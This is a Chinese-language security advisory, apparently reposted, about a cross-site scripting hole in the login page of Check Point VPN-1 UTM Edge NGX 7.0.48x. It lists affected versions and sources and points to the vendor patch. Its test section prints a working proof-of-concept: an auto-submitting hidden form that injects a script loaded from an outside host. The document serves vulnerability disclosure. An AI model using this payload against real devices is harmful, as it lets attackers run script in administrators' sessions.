概述
受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.0.48x
不受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.5.48
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28116
VPN-1 UTM Edge是集成了防病毒、防火墙、入侵防护和VPN技术的安全接入解决方案。
VPN-1 UTM Edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。
VPN-1 UTM Edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。由于设备不接受GET请求中的参数,因此攻击者必须要使用POST请求来利用这个漏洞。
<*来源:Henri Lindberg (henri.lindberg@louhi.fi)
链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">
<input name="user" value="'<script/src=//l7.fi></script>">
</form>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.checkpoint.com
最后
以上就是诚心母鸡为你收集整理的Check Point VPN-1 UTM Edge登录页面跨站脚本漏洞 的全部内容,希望文章能够帮你解决Check Point VPN-1 UTM Edge登录页面跨站脚本漏洞 所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复